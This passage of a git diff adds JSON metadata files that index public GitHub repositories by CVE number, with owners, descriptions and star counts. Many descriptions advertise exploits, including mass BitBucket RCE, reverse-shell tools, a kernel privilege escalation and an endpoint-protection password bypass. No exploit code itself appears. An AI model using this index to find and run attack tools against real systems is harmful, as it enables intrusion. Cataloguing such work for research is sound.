"updated_at": "2024-08-12T20:28:47Z", + "pushed_at": "2023-10-18T02:01:03Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "backup-manager", + "cve-2022-36537", + "exploit", + "security", + "vulnerability", + "web3", + "zk-framework" + ], + "visibility": "public", + "forks": 6, + "watchers": 35, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36539.json b/2022/CVE-2022-36539.json new file mode 100644 index 0000000000..f40e2dab8e --- /dev/null +++ b/2022/CVE-2022-36539.json @@ -0,0 +1,33 @@ +[ + { + "id": 533665078, + "name": "CVE-2022-36539", + "full_name": "Fopje\/CVE-2022-36539", + "owner": { + "login": "Fopje", + "id": 4934752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4934752?v=4", + "html_url": "https:\/\/github.com\/Fopje", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fopje\/CVE-2022-36539", + "description": "Insecure Permissions WeDayCare", + "fork": false, + "created_at": "2022-09-07T07:58:08Z", + "updated_at": "2024-01-17T16:04:14Z", + "pushed_at": "2022-09-07T08:11:33Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36553.json b/2022/CVE-2022-36553.json new file mode 100644 index 0000000000..a18eee0a7a --- /dev/null +++ b/2022/CVE-2022-36553.json @@ -0,0 +1,41 @@ +[ + { + "id": 740696426, + "name": "CVE-2022-36553-PoC", + "full_name": "0xNslabs\/CVE-2022-36553-PoC", + "owner": { + "login": "0xNslabs", + "id": 122338332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122338332?v=4", + "html_url": "https:\/\/github.com\/0xNslabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xNslabs\/CVE-2022-36553-PoC", + "description": "PoC Script for CVE-2022-36553: Exploits an unauthenticated remote command injection vulnerability in Hytec Inter HWL-2511-SS device.", + "fork": false, + "created_at": "2024-01-08T21:53:46Z", + "updated_at": "2024-03-04T15:23:45Z", + "pushed_at": "2024-01-08T22:39:33Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve-2022-36553", + "ethical-hacking", + "exploit", + "iot-security", + "reverse-shell", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3656.json b/2022/CVE-2022-3656.json new file mode 100644 index 0000000000..8c1fe8b5a5 --- /dev/null +++ b/2022/CVE-2022-3656.json @@ -0,0 +1,33 @@ +[ + { + "id": 588408716, + "name": "CVE-2022-3656", + "full_name": "momika233\/CVE-2022-3656", + "owner": { + "login": "momika233", + "id": 56291820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4", + "html_url": "https:\/\/github.com\/momika233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momika233\/CVE-2022-3656", + "description": null, + "fork": false, + "created_at": "2023-01-13T03:26:14Z", + "updated_at": "2024-08-30T15:13:27Z", + "pushed_at": "2023-01-13T03:35:05Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 38, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36663.json b/2022/CVE-2022-36663.json new file mode 100644 index 0000000000..4999148849 --- /dev/null +++ b/2022/CVE-2022-36663.json @@ -0,0 +1,33 @@ +[ + { + "id": 556017965, + "name": "CVE-2022-36663-PoC", + "full_name": "aqeisi\/CVE-2022-36663-PoC", + "owner": { + "login": "aqeisi", + "id": 84850150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84850150?v=4", + "html_url": "https:\/\/github.com\/aqeisi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aqeisi\/CVE-2022-36663-PoC", + "description": "Internal network scanner through Gluu IAM blind ssrf", + "fork": false, + "created_at": "2022-10-22T21:55:33Z", + "updated_at": "2022-11-02T20:18:42Z", + "pushed_at": "2022-11-02T20:14:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36752.json b/2022/CVE-2022-36752.json new file mode 100644 index 0000000000..9134e041b7 --- /dev/null +++ b/2022/CVE-2022-36752.json @@ -0,0 +1,33 @@ +[ + { + "id": 595842528, + "name": "CVE-2022-36752", + "full_name": "Halcy0nic\/CVE-2022-36752", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-36752", + "description": "Proof of concept for CVE-2022-36752", + "fork": false, + "created_at": "2023-01-31T23:14:06Z", + "updated_at": "2024-07-02T20:34:25Z", + "pushed_at": "2023-01-31T23:51:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36779.json b/2022/CVE-2022-36779.json new file mode 100644 index 0000000000..efd3e71448 --- /dev/null +++ b/2022/CVE-2022-36779.json @@ -0,0 +1,64 @@ +[ + { + "id": 735282415, + "name": "CVE-2022-36779", + "full_name": "rootDR\/CVE-2022-36779", + "owner": { + "login": "rootDR", + "id": 107951097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107951097?v=4", + "html_url": "https:\/\/github.com\/rootDR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rootDR\/CVE-2022-36779", + "description": "Exploit for CVE-2022-36779 authenticated Command Injection", + "fork": false, + "created_at": "2023-12-24T10:46:50Z", + "updated_at": "2024-05-27T18:31:19Z", + "pushed_at": "2023-12-24T11:27:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810016226, + "name": "CVE-2022-36779", + "full_name": "EmadYaY\/CVE-2022-36779", + "owner": { + "login": "EmadYaY", + "id": 80041099, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80041099?v=4", + "html_url": "https:\/\/github.com\/EmadYaY", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EmadYaY\/CVE-2022-36779", + "description": "exploit code", + "fork": false, + "created_at": "2024-06-03T22:25:31Z", + "updated_at": "2024-06-03T22:32:34Z", + "pushed_at": "2024-06-03T22:32:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36804.json b/2022/CVE-2022-36804.json new file mode 100644 index 0000000000..ce42703592 --- /dev/null +++ b/2022/CVE-2022-36804.json @@ -0,0 +1,494 @@ +[ + { + "id": 533698492, + "name": "CVE-2022-36804", + "full_name": "notdls\/CVE-2022-36804", + "owner": { + "login": "notdls", + "id": 25024098, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25024098?v=4", + "html_url": "https:\/\/github.com\/notdls", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notdls\/CVE-2022-36804", + "description": "A real exploit for BitBucket RCE CVE-2022-36804", + "fork": false, + "created_at": "2022-09-07T09:35:49Z", + "updated_at": "2025-01-07T04:36:44Z", + "pushed_at": "2024-08-31T01:26:35Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 36, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 538510407, + "name": "CVE-2022-36804-PoC", + "full_name": "notxesh\/CVE-2022-36804-PoC", + "owner": { + "login": "notxesh", + "id": 49665312, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49665312?v=4", + "html_url": "https:\/\/github.com\/notxesh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notxesh\/CVE-2022-36804-PoC", + "description": "Multithreaded exploit script for CVE-2022-36804 affecting BitBucket versions <8.3.1", + "fork": false, + "created_at": "2022-09-19T13:15:13Z", + "updated_at": "2023-01-09T12:32:37Z", + "pushed_at": "2022-09-19T13:49:27Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 538761954, + "name": "CVE-2022-36804-MASS-RCE", + "full_name": "JRandomSage\/CVE-2022-36804-MASS-RCE", + "owner": { + "login": "JRandomSage", + "id": 77659133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77659133?v=4", + "html_url": "https:\/\/github.com\/JRandomSage", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JRandomSage\/CVE-2022-36804-MASS-RCE", + "description": "A critical vulnerability (CVE-2022-36804) in Atlassian Bitbucket Server and Data Center could be exploited by unauthorized attackers to execute malicious code on vulnerable instances. ", + "fork": false, + "created_at": "2022-09-20T01:30:29Z", + "updated_at": "2022-09-23T08:42:48Z", + "pushed_at": "2022-09-10T09:07:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 538779944, + "name": "CVE-2022-36804-PoC-Exploit", + "full_name": "benjaminhays\/CVE-2022-36804-PoC-Exploit", + "owner": { + "login": "benjaminhays", + "id": 106408899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106408899?v=4", + "html_url": "https:\/\/github.com\/benjaminhays", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/benjaminhays\/CVE-2022-36804-PoC-Exploit", + "description": "Somewhat Reliable PoC Exploit for CVE-2022-36804 (BitBucket Critical Command Injection)", + "fork": false, + "created_at": "2022-09-20T02:35:53Z", + "updated_at": "2023-10-14T03:31:30Z", + "pushed_at": "2023-11-23T03:45:09Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 538923286, + "name": "bitbucket-cve-2022-36804", + "full_name": "Vulnmachines\/bitbucket-cve-2022-36804", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/bitbucket-cve-2022-36804", + "description": "CVE-2022-36804 Atlassian Bitbucket Command Injection Vulnerability", + "fork": false, + "created_at": "2022-09-20T10:08:47Z", + "updated_at": "2023-02-28T15:12:40Z", + "pushed_at": "2022-10-15T06:37:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 539432576, + "name": "CVE-2022-36804-POC", + "full_name": "kljunowsky\/CVE-2022-36804-POC", + "owner": { + "login": "kljunowsky", + "id": 104329412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104329412?v=4", + "html_url": "https:\/\/github.com\/kljunowsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kljunowsky\/CVE-2022-36804-POC", + "description": "Bitbucket CVE-2022-36804 unauthenticated remote command execution", + "fork": false, + "created_at": "2022-09-21T10:36:50Z", + "updated_at": "2024-12-14T03:54:12Z", + "pushed_at": "2023-01-21T02:14:15Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian", + "atlassian-bitbucket", + "bitbucket", + "bug-bounty", + "cve-2022-36804", + "exploit", + "hack", + "hacking", + "infosec", + "penetration-testing", + "penetration-testing-tools", + "poc", + "rce", + "security" + ], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 540400573, + "name": "CVE-2022-36804-ReverseShell", + "full_name": "Chocapikk\/CVE-2022-36804-ReverseShell", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-36804-ReverseShell", + "description": "PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection)", + "fork": false, + "created_at": "2022-09-23T11:05:22Z", + "updated_at": "2024-08-12T20:27:15Z", + "pushed_at": "2022-09-24T15:19:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 540713828, + "name": "CVE-2022-36804", + "full_name": "khal4n1\/CVE-2022-36804", + "owner": { + "login": "khal4n1", + "id": 38965063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38965063?v=4", + "html_url": "https:\/\/github.com\/khal4n1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/khal4n1\/CVE-2022-36804", + "description": "You can find a python script to exploit the vulnerability on Bitbucket related CVE-2022-36804.", + "fork": false, + "created_at": "2022-09-24T05:04:30Z", + "updated_at": "2024-06-05T09:03:41Z", + "pushed_at": "2022-10-25T02:39:33Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 540933347, + "name": "CVE-2022-36804-ReverseShell", + "full_name": "0xEleven\/CVE-2022-36804-ReverseShell", + "owner": { + "login": "0xEleven", + "id": 45062245, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45062245?v=4", + "html_url": "https:\/\/github.com\/0xEleven", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xEleven\/CVE-2022-36804-ReverseShell", + "description": "PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection)", + "fork": false, + "created_at": "2022-09-24T18:46:56Z", + "updated_at": "2024-03-21T18:12:02Z", + "pushed_at": "2022-09-24T15:19:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 541177106, + "name": "cve-2022-36804", + "full_name": "tahtaciburak\/cve-2022-36804", + "owner": { + "login": "tahtaciburak", + "id": 16239725, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16239725?v=4", + "html_url": "https:\/\/github.com\/tahtaciburak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tahtaciburak\/cve-2022-36804", + "description": "A simple PoC for Atlassian Bitbucket RCE [CVE-2022-36804]", + "fork": false, + "created_at": "2022-09-25T13:16:57Z", + "updated_at": "2024-08-12T20:27:19Z", + "pushed_at": "2022-09-25T13:18:20Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bitbucket", + "cve-2022-36804", + "poc", + "rce" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 541485417, + "name": "CVE-2022-36804", + "full_name": "Inplex-sys\/CVE-2022-36804", + "owner": { + "login": "Inplex-sys", + "id": 69421356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4", + "html_url": "https:\/\/github.com\/Inplex-sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-36804", + "description": "A loader for bitbucket 2022 rce (cve-2022-36804)", + "fork": false, + "created_at": "2022-09-26T08:35:31Z", + "updated_at": "2024-06-21T00:10:24Z", + "pushed_at": "2022-10-01T13:03:43Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bitbucket", + "cve", + "cve-2022-36804", + "exploit-db", + "poc", + "rce" + ], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 545363094, + "name": "CVE-2022-36804", + "full_name": "ColdFusionX\/CVE-2022-36804", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2022-36804", + "description": "Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)", + "fork": false, + "created_at": "2022-10-04T08:26:12Z", + "updated_at": "2023-08-30T07:20:35Z", + "pushed_at": "2022-10-04T08:51:25Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 580496986, + "name": "CVE-2022-36804", + "full_name": "devengpk\/CVE-2022-36804", + "owner": { + "login": "devengpk", + "id": 41437020, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41437020?v=4", + "html_url": "https:\/\/github.com\/devengpk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devengpk\/CVE-2022-36804", + "description": null, + "fork": false, + "created_at": "2022-12-20T17:55:19Z", + "updated_at": "2022-12-22T19:57:50Z", + "pushed_at": "2022-12-20T18:00:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 592304483, + "name": "cve-2022-36804", + "full_name": "walnutsecurity\/cve-2022-36804", + "owner": { + "login": "walnutsecurity", + "id": 92915142, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92915142?v=4", + "html_url": "https:\/\/github.com\/walnutsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/walnutsecurity\/cve-2022-36804", + "description": "A critical command injection vulnerability was found in multiple API endpoints of the Atlassian Bit bucket Server and Data center. This vulnerability affects all versions of Bitbucket Server and Data Center released before versions <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2, and <8.3.1", + "fork": false, + "created_at": "2023-01-23T12:51:09Z", + "updated_at": "2024-07-05T04:30:49Z", + "pushed_at": "2023-01-25T10:04:41Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 596350876, + "name": "Atlassian-Bitbucket-CVE-2022-36804", + "full_name": "imbas007\/Atlassian-Bitbucket-CVE-2022-36804", + "owner": { + "login": "imbas007", + "id": 100182585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100182585?v=4", + "html_url": "https:\/\/github.com\/imbas007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imbas007\/Atlassian-Bitbucket-CVE-2022-36804", + "description": null, + "fork": false, + "created_at": "2023-02-02T01:42:26Z", + "updated_at": "2023-02-02T01:55:08Z", + "pushed_at": "2023-02-02T02:58:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36944.json b/2022/CVE-2022-36944.json new file mode 100644 index 0000000000..45700ae0eb --- /dev/null +++ b/2022/CVE-2022-36944.json @@ -0,0 +1,33 @@ +[ + { + "id": 641498684, + "name": "lazylist-cve-poc", + "full_name": "yarocher\/lazylist-cve-poc", + "owner": { + "login": "yarocher", + "id": 71639641, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71639641?v=4", + "html_url": "https:\/\/github.com\/yarocher", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yarocher\/lazylist-cve-poc", + "description": "POC for the CVE-2022-36944 vulnerability exploit", + "fork": false, + "created_at": "2023-05-16T15:38:49Z", + "updated_at": "2024-11-07T04:32:53Z", + "pushed_at": "2023-05-16T15:50:03Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36946.json b/2022/CVE-2022-36946.json new file mode 100644 index 0000000000..1f8bfa503c --- /dev/null +++ b/2022/CVE-2022-36946.json @@ -0,0 +1,71 @@ +[ + { + "id": 518816810, + "name": "CVE-2022-36946", + "full_name": "Pwnzer0tt1\/CVE-2022-36946", + "owner": { + "login": "Pwnzer0tt1", + "id": 107208935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107208935?v=4", + "html_url": "https:\/\/github.com\/Pwnzer0tt1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pwnzer0tt1\/CVE-2022-36946", + "description": "CVE-2022-36946 linux kernel panic in netfilter_queue", + "fork": false, + "created_at": "2022-07-28T11:22:13Z", + "updated_at": "2024-08-12T20:25:35Z", + "pushed_at": "2024-06-21T18:53:25Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "denial-of-service", + "kernel", + "linux", + "linux-kernel", + "security" + ], + "visibility": "public", + "forks": 5, + "watchers": 19, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 561255728, + "name": "linux-4.19.72_CVE-2022-36946", + "full_name": "Satheesh575555\/linux-4.19.72_CVE-2022-36946", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.19.72_CVE-2022-36946", + "description": null, + "fork": false, + "created_at": "2022-11-03T09:49:23Z", + "updated_at": "2023-03-08T01:54:32Z", + "pushed_at": "2022-11-10T07:03:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3699.json b/2022/CVE-2022-3699.json new file mode 100644 index 0000000000..cdf949cf28 --- /dev/null +++ b/2022/CVE-2022-3699.json @@ -0,0 +1,95 @@ +[ + { + "id": 563872905, + "name": "CVE-2022-3699", + "full_name": "alfarom256\/CVE-2022-3699", + "owner": { + "login": "alfarom256", + "id": 36286171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36286171?v=4", + "html_url": "https:\/\/github.com\/alfarom256", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alfarom256\/CVE-2022-3699", + "description": "Lenovo Diagnostics Driver EoP - Arbitrary R\/W", + "fork": false, + "created_at": "2022-11-09T14:15:30Z", + "updated_at": "2024-12-08T17:04:10Z", + "pushed_at": "2022-12-05T23:36:42Z", + "stargazers_count": 170, + "watchers_count": 170, + "has_discussions": false, + "forks_count": 47, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 47, + "watchers": 170, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 581965577, + "name": "lenovo_exec", + "full_name": "estimated1337\/lenovo_exec", + "owner": { + "login": "estimated1337", + "id": 91435835, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91435835?v=4", + "html_url": "https:\/\/github.com\/estimated1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/estimated1337\/lenovo_exec", + "description": "CVE-2022-3699 with arbitrary kernel code execution capability", + "fork": false, + "created_at": "2022-12-25T04:34:26Z", + "updated_at": "2024-11-30T14:21:19Z", + "pushed_at": "2022-12-27T21:30:08Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 69, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 845287879, + "name": "CVE-2022-3699", + "full_name": "Eap2468\/CVE-2022-3699", + "owner": { + "login": "Eap2468", + "id": 68890963, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68890963?v=4", + "html_url": "https:\/\/github.com\/Eap2468", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Eap2468\/CVE-2022-3699", + "description": "Proof of Concept exploit for CVE-2022-3699", + "fork": false, + "created_at": "2024-08-21T00:42:40Z", + "updated_at": "2024-08-21T18:39:04Z", + "pushed_at": "2024-08-21T18:39:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37017.json b/2022/CVE-2022-37017.json new file mode 100644 index 0000000000..7bed8be161 --- /dev/null +++ b/2022/CVE-2022-37017.json @@ -0,0 +1,33 @@ +[ + { + "id": 831718045, + "name": "CVE-2022-37017", + "full_name": "apeppels\/CVE-2022-37017", + "owner": { + "login": "apeppels", + "id": 37070105, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37070105?v=4", + "html_url": "https:\/\/github.com\/apeppels", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/apeppels\/CVE-2022-37017", + "description": "Bypass for Symantec Endpoint Protection's Client User Interface Password", + "fork": false, + "created_at": "2024-07-21T12:26:35Z", + "updated_at": "2024-07-21T12:43:43Z", + "pushed_at": "2024-07-21T12:43:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37032.json b/2022/CVE-2022-37032.json new file mode 100644 index 0000000000..ad43f7df1e --- /dev/null +++ b/2022/CVE-2022-37032.json @@ -0,0 +1,33 @@ +[ + { + "id": 604134446, + "name": "CVE-2022-37032", + "full_name": "spwpun\/CVE-2022-37032", + "owner": { + "login": "spwpun", + "id": 32606457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32606457?v=4", + "html_url": "https:\/\/github.com\/spwpun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/spwpun\/CVE-2022-37032", + "description": "PoC for CVE-2022-37032,tested on frr-8.3。", + "fork": false, + "created_at": "2023-02-20T12:07:22Z", + "updated_at": "2023-06-08T00:39:31Z", + "pushed_at": "2023-02-20T12:13:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + 